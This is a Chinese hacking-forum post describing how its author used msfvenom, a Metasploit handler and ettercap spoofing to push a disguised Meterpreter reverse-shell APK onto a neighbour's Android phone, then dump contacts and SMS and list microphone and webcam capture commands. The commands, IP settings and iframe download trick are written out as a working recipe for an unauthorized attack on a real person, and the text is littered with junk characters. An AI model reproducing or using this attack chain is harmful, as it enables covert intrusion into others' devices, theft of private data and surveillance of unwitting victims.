找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2627|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 U B7 e* ^/ l+ U4 } 五、msf+ettercap入侵邻居安卓手机 5 u( k3 D) Y$ _

' L4 y% u5 d5 b! z7 a& i& n

! A2 h: c8 M% p! W S 首先启动msf , L& r* D# C% ^! D

2 `8 x2 z! ~+ W/ e# R

, a9 g, |2 S( f& y2 D& c4 ~+ e 先用kali生成一个安卓木马,如下命令: 5 n; N4 ~$ \' _+ V' b! F- F

. b. j5 }( i5 m; ]$ z* d. q8 e

$ N) j. D9 B" ^: U; J1 u" ]: u Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk : P" ?2 ?' V& S+ o7 v, u* k1 z3 E

2 D- o! |2 P3 b1 p; g! V1 x

( E/ A2 w0 ?; P2 D) ^4 ] 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 0 \$ \% g; U ]6 r8 h, V8 c, R8 M2 q

/ p) i2 F8 [; h) I. x$ r8 [0 g: M

e, b1 Z" K6 X. I/ T* v 然后进入msf 8 a* e3 n, t3 ]! y& R4 h" q

6 I# q8 R9 `% ]

, z% h6 q; n! A+ L+ I use exploit/multi/handler ! X- W) Q! p$ |2 d" u- Z

4 {( c; N {* T8 `9 s' {

6 `: E3 [( S8 z3 t4 v. K set payload android/meterpreter/reverse_tcp 3 R b0 D5 F& Q5 {9 t& b* Z6 v, v

/ B: ~/ [4 T2 q: `

& h3 C3 P4 d/ C8 c( T5 o; a# A6 s set LHOST 192.168.0.109 //ipkailiip 7 X7 @. j# H' e9 S

- I0 c$ Y: \7 J f! [2 ?( X% T

( M8 U. J, a" ]7 n set LPORT 44444 //端口一定要与前面生成的木马的端口一致 9 h) \! K0 D4 f5 l3 i( z

6 y1 V5 z- o b, l- u

3 V b+ I! y: N Exploit / ^( ~$ m/ Z% s# [

# {! p' K7 ?7 I% R6 H) {6 i9 _

0 X& a' n* f9 C/ k7 q/ \- D1 j9 l {8 e   6 h6 i/ Q& @7 D7 D1 R8 V

9 o. f- {: D* J. J) @- P% p

+ E/ ], C; C7 j 下面我们开启ettercap -G ! M+ o# o: q# G! E! a5 R- p. Y% T( I

9 m6 V- `- T* L \! y' z

2 s0 |; ?: n6 b& N, d- c- d 我物理IP 2 X3 V+ r3 u- N# j8 ?

* R ]- J# ~2 e9 \& E Z7 \1 ^- T

: w2 l/ P1 @/ t9 S2 _+ J/ T   / |2 w; _2 C4 ?3 {1 c2 o

l* o, ?: }6 |* s' J' S) ]/ I

; l8 y0 w" q' c, [7 U 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, + u; m( A: }$ z" p* b O

( w, o# e1 x( V. K; X5 t

9 ]4 U4 e/ S& I 下面我们来设置一下 5 ^% @7 w$ X+ G, `2 k

7 H; P I. ^: V6 F3 X1 r# @

) w2 F) A) ~3 k- t; ^( R: y% n, X   ! J9 [5 B1 u; Y% r. D8 K+ g9 V9 g

7 w$ I1 Y ~# r) l5 X

# I& z" t3 w. L: l( m 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, $ i" B7 u% P0 z3 T) i& }

5 r* y( v5 O& w) x* X+ U

. n7 _3 ~) W9 |7 j6 S   " Z$ @- \" g( w$ P1 }

- ^8 X+ y/ J+ J3 W0 |9 f7 L

% O1 N0 r: P: A% C, f0 I' ?: O   5 M2 R% c- L( s, N4 K2 c

/ q0 M! `8 j: J6 @7 p& k

! W1 C6 t2 h/ T& F& `/ }7 h# z   5 v. p' c- u/ i/ x$ }

& S$ k& G: _1 }3 s

* f0 E$ J+ t. ] B u6 Z9 O1 c* _% b   4 U0 w% p) d1 u( y; K. p) [& @3 R9 i

* m! z+ n5 B, J5 N. e

1 D0 b* M w6 V+ `4 s8 s   $ m9 R' R- G. v( j

5 s; q6 C% d) c0 O

/ \9 V& Q) T) a7 `" R6 a9 Y   - I0 j4 a4 O4 b" O3 _: o7 n

: e% j' V+ B$ Y8 I6 C- b

9 A. D" H; U( D   - N9 p% E9 \" q: r0 `4 u

0 I, I1 ` R# Z; L' d3 N

' H- i8 m$ n' e/ r   * e/ l) B" }* M& _# @3 _

- P, D b( Q+ Q- q5 ?

1 x0 S8 K: s9 V- v1 B$ q$ M   & u* B" K0 S: `% d0 L

) U) v- Z. q+ s6 e% ~

* K( O" a+ |: Y8 P! S4 x   & a1 K7 b. t* ?. |1 `! O$ i

/ j6 s* ^) y3 x; c. {

. F" E2 P; \2 s2 x$ y) {$ s   . F9 \+ S6 E0 x. b# K

6 K. M8 s* J- ~

% Z& P% Z/ c$ g4 k   * D0 }, {$ F; H {

2 y2 S. P: S6 u1 Z2 X: m) M7 X

& a) C) Y( q1 g/ Q6 J+ Z0 H   - W0 c: M9 A* W

. f3 b3 U6 z, v' I/ _8 C

4 ~% N9 k! C0 P x' _ 下面我们开始攻击 : S( \7 e4 e0 Y6 J+ |

6 N1 x0 w9 l# ]3 v `4 P

7 _- R0 ]+ P1 z4 L* {4 f   9 N; P" U2 h8 D2 d7 J" C j& J

- t: w& [- T. k/ e l3 [! n6 Q

5 O' X( q! I8 }9 H' o% ?, x   : u3 {( @2 ]. `" B( m

' n, ]. d9 Y+ Z& b7 I- e5 T

) g" `) _; @4 k; w+ Q# K   & k& @1 f9 c+ E" @

& ~# h4 U% C+ m. [/ e5 k; l' e

8 ]* K4 t9 h4 D" A! v0 S   & I' h. n( m5 R) Z( y

' Q7 c' e! t8 J2 I1 t4 m

" Q4 z, N: g# }# V   7 l* ^2 y' j; {8 G

. J) V2 v1 k$ Z6 j

, A/ p# l k' [; O5 I; h- Q 大概过了5分钟多,发现反弹成功了 9 o2 R3 i: F- S/ T

+ m$ W* B! Z5 |

c$ I# V- h# ?' w5 M   % I" O5 A6 E) d& Q. m! O( n; x. p

" U: B1 {/ b& d* K* w9 O4 E- E

. O; N4 c1 m" r8 D+ U   - {& R. O& }6 \0 p; @

/ P+ i; O, h9 K/ x

3 t6 f# m" i* [ o6 ]) O   2 Q0 A4 W& l: m* e, x* K Q

! u! p: w# z9 S

! K; X' [, z" u0 B1 m( ]   1 J `; d* k1 \( T

) J5 z {# j4 w# S! G" K: t

) M" X; x/ }8 y4 a4 r   ! L5 ~6 d% Z8 s9 P$ J, ?% G

$ H* T: y: n! D* J. M1 Q* t

$ r3 \, ~5 T3 R$ A   " h% |6 m" X4 X! Y! K% I. [' A. m

" W% D; z8 X+ U* c! w* y3 a

9 r& ]& y, G2 X2 O( O) f9 b+ Q   2 P( k: | i+ i0 S3 [5 E

F, K# M5 V0 w' H, V; x( t d

/ r$ D% L5 e$ O( B5 \ 执行命令 ' J. J1 k, C& F- D

: z! N$ {, z+ l% r0 w

7 t6 m B+ o* I# H   * X* o* J, Y& o; U7 R

, p# H- n7 `3 N) Z9 }

2 @/ f$ p6 b/ `9 } dump_contacts    --》这个是导出电话 9 h5 g- ~1 u2 c& b) r

! S% g: E, J( s" Q& U

8 |. j$ }" p) ]% }4 a# x$ A( n dump_sms --》这个是导出信息 9 i. L: V' x$ b2 j# D6 H$ D

+ A$ B. e4 o- B9 _; \/ |9 K

8 o, A. t/ A& y5 Z5 Z9 D record_mic     Record audio from the default microphone for X seconds / v# s. p0 v- F( F B; w: b j

' r# s- P3 r) }% V

/ H7 m" w+ u; f+ C6 A0 K7 }     webcam_chat    Start a video chat " c9 O4 k. f7 W# [, Z8 ]: C

! y; o" _6 {, B! {2 f8 b

# ?& r& u* B6 V+ c! f3 h" |     webcam_list    List webcams " P" ]9 i2 X7 R7 _) @" {% T; e, ?$ q

: J. O$ ]* }# X9 ?; F( F

2 {- f- b1 \' j6 T     webcam_snap    Take a snapshot from the specified webcam * j9 c- f% C L9 R& O- ^! _* ^. _3 ?

4 u8 v) z1 K+ _( h" u$ u* W& A4 t

& q# k" H4 S. ~! g s webcam_stream  lay a video stream from the specified webcam ; f" q6 k& q8 d7 B8 e+ x. q5 X

9 \( v3 r8 p) z. R" w; h. s& |6 d) n

' k3 p1 x) Y. `5 u" y. E# ]) b1 y& B   5 d' a, [# r; w, g# o

" f* q; y$ _; J) d6 z" B2 s" e

/ j0 _* b0 x# c; E$ Z: M   ( K/ D) z H7 p9 i$ i: L

- G5 x! Z6 t( p* C

: _ c" o8 u& w# n 我们打开看一下电话薄, & g1 O4 A4 S/ f6 J. w# G6 l

S/ j3 n: a; L [) }

1 ~6 H+ _9 `7 _! _   : \) l, U: `. U! S% ~$ r

; @ X [# n8 i F4 M1 S

$ o7 u7 |6 X$ K8 T   , Z. [" H5 s. J

% i+ j$ S8 t8 P

# r5 w+ y: J6 w* ~9 E0 U! w% e   $ e% V4 l7 K$ s. [& B, p

1 L1 n- s( L; H7 X4 |: c

8 d; ^' G! |) R2 w+ i! i" M0 L   , d1 K3 Z2 e$ `

4 U/ p: L# a1 o1 g9 W/ X

9 p' ?9 I; l7 d' s2 N$ ]   4 P* s: [ m2 w7 U

T& x! Q" T5 @

9 m$ |% l p* o Y# _1 u   2 [# T7 J. B5 _: Z( h, j

4 a8 @/ ~7 R# U; Q: Z! s

0 }0 T1 z$ Q! Z4 ]2 n: S! d! x 我们同时欺骗成DroidJack木马,使用方法如图: * {) K! n& {7 U/ e( C# l

7 T) R' V! N8 }5 I9 K: y

3 o- o/ [9 h/ D1 s   & O: {/ F0 P+ f) T5 m( h6 J

3 J) o+ x, W: m2 v

7 x8 Y' p% m3 @7 M8 ]9 j   ; b- |: |& K2 ^' R4 D

& s( s% J1 \7 U6 R

; m; W1 m' Z3 k* p# R" Y   : }; X9 I' K% Z

" o$ z0 { t6 `9 F# b7 g

/ `$ h- J% ^( b' k 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ! n7 K0 T- T3 p. y

' f& _% |, h1 a

( r; H, \" Z" }1 m" |8 y( d% Q* ^( e   ( h" B3 U6 K* l+ o) {

8 E' R% k! f- `

~4 z2 G; s) @' @   7 D% @& m1 i! J# ^

* J8 u; y" u" w; ~2 }0 S1 Y

3 o+ V7 g1 @8 ~' r/ k8 S& s   ' x0 r, {! l9 Z! G" V) q

v% n# v: R- S, E8 Q2 Q

' m6 [3 i1 z; S1 Y 0 W# ?5 S0 a% k2 s

/ K3 F5 n2 i& u0 V# [

; Z' }* ?6 ^/ w2 {% o
, r, T W# X0 W1 f' ]" F

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表